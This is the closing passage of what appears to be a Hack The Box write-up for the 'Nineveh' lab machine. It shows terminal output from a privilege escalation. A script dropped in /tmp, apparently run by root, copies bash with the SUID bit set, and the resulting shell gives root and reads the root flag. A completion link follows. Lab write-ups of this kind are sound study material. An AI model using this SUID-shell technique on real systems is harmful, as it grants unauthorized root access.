amrois@nineveh:~$ echo "cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash" > /tmp/update
amrois@nineveh:~$ chmod +x /tmp/update
amrois@nineveh:~$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash
amrois@nineveh:~$


amrois@nineveh:~$ cat /tmp/update
cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash
amrois@nineveh:~$ ls -la /tmp/rootbash
-rwsr-xr-x 1 root root 1037528 May 27 02:59 /tmp/rootbash
amrois@nineveh:~$ /tmp/rootbash -p
rootbash-4.3# id
uid=1000(amrois) gid=1000(amrois) euid=0(root) groups=1000(amrois)
rootbash-4.3# cat /root/root.txt
a0bf015e98ee7483a9a841a9cd16fc9c
rootbash-4.3#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/54


https://sh1yan.top/2024/05/27/Nineveh-htb-writeup/
Author: shiyan
Published: 2024-05-27
License: